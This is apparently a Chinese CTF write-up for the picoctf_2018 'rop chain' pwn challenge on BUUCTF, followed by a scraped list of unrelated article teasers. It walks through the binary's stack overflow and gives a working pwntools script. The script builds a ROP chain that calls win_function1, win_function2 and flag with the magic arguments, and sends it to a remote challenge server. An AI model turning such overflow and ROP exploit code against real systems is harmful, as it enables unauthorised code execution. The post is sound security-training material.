BUUCTF pwn——picoctf_2018_rop chain

news2024/12/23 10:22:08

checksec && 运行

在这里插入图片描述

ida

main函数调用vuln函数

在这里插入图片描述

名为vuln的函数存在溢出

在这里插入图片描述

名为flag的函数,通过校验可直接getflag

具体校验过程看图,只有win1和win2均为真,并且a1的值等于0xDEADBAAD才能getflag
在这里插入图片描述

变量win2的真假性通过win_function2函数确定

具体校验过程看图,只有win1的值为真,且a1的值等于0xBAAAAAAD,win2才能为真
在这里插入图片描述

给输入分配的栈空间为0x18

在这里插入图片描述

利用思路

构造ROP链,将函数地址与通过校验用到的参数值依次压入栈空间,从而getflag

代码

'''
@Author       : 白银
@Date         : 2023-04-26 14:29:56
@LastEditors  : 白银
@LastEditTime : 2023-04-26 16:11:17
@FilePath     : /pwn/PicoCTF_2018_rop_chain.py
@Description  : https://buuoj.cn/challenges#picoctf_2018_rop%20chain
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
# from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './PicoCTF_2018_rop_chain'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 25045)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        # libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.27x64libc.so.6')
    else:
        # libc = elf.libc
        # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        libc = ELF('/home/usrname/Desktop/2.27x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    # libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    libc = ELF('/home/usrname/Desktop/2.27x86libc.so.6')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x1c # ida看,s变量的上限和r差多少
win1_addr = 0x80485CB
win2_addr = 0x80485D8
flag_addr = 0x804862B
win2_a1 = 0xBAAAAAAD
flag_a1 = 0xDEADBAAD

payload = flat(['a' * padding, win1_addr, win2_addr, flag_addr, win2_a1, flag_a1])

io.sendlineafter('Enter your input> ', payload)

io.interactive()

没有shell,直接getflag

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/464368.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

三个练手的软件测试实战项目(附全套视频跟源码)偷偷卷死他们

项目一:12306抢票项目 项目测试目的 学会Selenium定位web元素的方法 熟练浏览器调试工具使用 项目主体步骤 1) 人工走一遍流程,对自动化的流程心中有数 2) 按步骤拆分,然后对每一个小步骤编写自动化脚本 3&#xff…

FreeRTOS(三)——应用开发(一)

文章目录 0x01 FreeRTOS文件夹FreeRTOSConfig.h文件内容上面定义的宏决定FreeRTOS.h文件中的定义0x02 创建任务创建静态任务过程configSUPPORT_STATIC_ALLOCATION创建动态任务过程configSUPPORT_DYNAMIC_ALLOCATION 0x03 FreeRTOS启动流程启动流程概述 0x04 任务管理任务调度器…

python基于轻量级YOLOv5的生猪检测+状态识别分析系统

在我之前的一篇文章中有过生猪检测盒状态识别相关的项目实践,如下: 《Python基于yolov4实现生猪检测及状态识》 感兴趣的话可以自行移步阅读,这里主要是基于同样的技术思想,将原始体积较大的yolov4模型做无缝替换,使…

关于python异常的总结

Python异常是在程序执行时发生的错误,可能会导致程序终止运行。 在Python中,异常处理是一种机制,它允许开发人员在程序发生异常时捕获、处理和报告这些异常,以便程序可以继续运行或在出现异常时进行优雅的退出。 在Python中&…

大数据之入门开发流程介绍

目录: 1、大数据的开发大致流程2、技术导图 1、大数据的开发大致流程 1.1 数据收集 大数据处理的第一步是数据的收集。现在的中大型项目通常采用微服务架构进行分布式部署,所以数据的采集需要在多台服务器上进行,且采集过程不能影响正常业务的…

Domino的线程ID和操作系统的进程ID对应关系

大家好,才是真的好。 很多时候,在Domino中运行的任务出现一些错误提示,如果能够准确定位到和提示信息相关任务时,对我们排错有着巨大的帮助,也能节省很多时间。 例如,我们可能在Domino实时控制台上看到以…

RedHat8配置本地YUM源

目录: RedHat8配置本地YUM源1、创建规则文件2、创建挂载点3、挂载ISO镜像(1).将iso镜像连接到虚拟机再进行挂载a.将ISO镜像连接虚拟机b.挂载镜像到挂载点c.使用df -h查看当前系统设备挂载情况 (2)将iso镜像上传至服务器再进行挂载a.将ISO镜像通过ftp工具上传b.挂载镜…

Spring Boot——优雅的参数校验

🎈 概述 当我们想提供可靠的 API 接口,对参数的校验,以保证最终数据入库的正确性,是 必不可少 的活。比如下图就是 我们一个项目里 新增一个菜单校验 参数的函数,写了一大堆的 if else 进行校验,或者基础校…

C#简单向:textbox添加提示内容

项目场景: 向C#窗体项目的textbox内添加提示内容,如下图所示效果: 具体实现: 首先: 1.到所要操作的文件(/xx.cs/xx.Designer.cs),这里我是到Form3.cs/Form3.Designer.cs文件 2.找到你所要操作的textBox&#xff0c…

数据结构与算法(一):基础数据结构(算法概念、数组、链表、栈、队列)

算法概念、数组、链表、栈、队列 判断一个数是否是2的N次方? N & (N-1) 0 (N > 0)算题: 力扣 https://leetcode.cn/POJ http://poj.org/ 算法 算法概念 算法代表: 高效率和低存储 内存占用小、CPU占用小、运算速度快 算法的高…

C# HttpClient使用JWT请求token调用接口,解决返回HTML网页的异常信息

一.项目目的: 1.使用JWT获取token,调用外部提供的接口,解决返回HTML错误信息。 错误缘由,接口服务器未能识别token,token信息不准确。 二.项目工具: Visual Studio(开发工具)&…

【Java|golang】1031. 两个非重叠子数组的最大和---前缀和+滑动窗口

给你一个整数数组 nums 和两个整数 firstLen 和 secondLen,请你找出并返回两个非重叠 子数组 中元素的最大和,长度分别为 firstLen 和 secondLen 。 长度为 firstLen 的子数组可以出现在长为 secondLen 的子数组之前或之后,但二者必须是不重…

专为Windows电脑和服务器设计的磁盘管理软件

关于Windows磁盘管理 磁盘管理是Windows自带工具,允许你对磁盘进行一些基本操作,Windows个人用户和Windows Server用户可以使用它来: 1. 创建一个新驱动器,如“新建简单卷”功能。 2. 将一个卷扩展到当前未被同一磁盘…

STM32CubeMX配置I2C通讯

1.如上图所示点击New Project 2.如上图所示选择自己所开发的新品最后双击芯片型号 3.配置RCC,我的芯片使用的是外部高速晶振。这里如图所选。 4.配置一下串口 5.配置I2C 6.根据自己的硬件选择时钟源和主频 6.①填写项目名②选择项目路径③选择开发环境④获取代码 …

Android build.gradle配置详解

Android Studio是采用gradle来构建项目的,gradle是基于groovy语言的,如果只是用它构建普通Android项目的话,是可以不去学groovy的。当我们创建一个Android项目时会包含两个Android build.gradle配置详解文件,如下图: …

2023 HDCTF --- Crypto wp

文章目录 Normal_RsaNormal_Rsa(revenge)爬过小山去看云Math_Rsa Normal_Rsa 题目: from Crypto.Util.number import * #from shin import flagmbytes_to_long(bHDCTF{****************}) e65537 pgetPrime(256) #qgetPrime(512) q67040062584277953042204504112809489262131…

Revit砌体排砖的几种方法对比

方法简介 传统砌体深化排砖是绘图者使用CAD 软件通过二维想象进行排布,在墙面转角、两面或多面墙相互咬砌的位置,门窗洞口过梁的位置,构造柱等位置由于二维图形的局限性很难观察出排布是否合理。然而复杂区域砌体排布若出错…

这个假期有这些游戏就不怕无聊了

1、塞尔达传说旷野之息 Switch端的优秀游戏体验不容错过! 人气王《塞尔达传说》! 被玩家誉为“唯一让人长大后有种回到童年的感觉的作品”。 豆瓣网友写道:“在雨夜,我在寺庙里看到了一条白龙划过天空,在岩壁上看到了…

花2个半月吃透这份软件测试核心知识,成功从外包上岸到京东

朋友小故事 受到疫情影响我从过完年从2月份开始学习的一份测试经手册,4月初我成功从我们一个小三线的公司跳槽到了腾讯,虽然等级不高,但是涨薪还是涨了8K,而且去一个大公司多学点东西,对自己的成长还是有好处的。 虽然…

零基础学java——【基础语法】基本输入、输出语句,变量,运算符

目录 变量 数据类型 基本数据类型一览表 声明和初始化 基本的输出、输出语句 输出语句 补充“”的使用 输入语句Scanner 使用步骤 代码演示 运算符 有些内容可能会与c语言作比较 内容借鉴了韩顺平老师的java课堂笔记(b站课) 变量 数据类型 基本…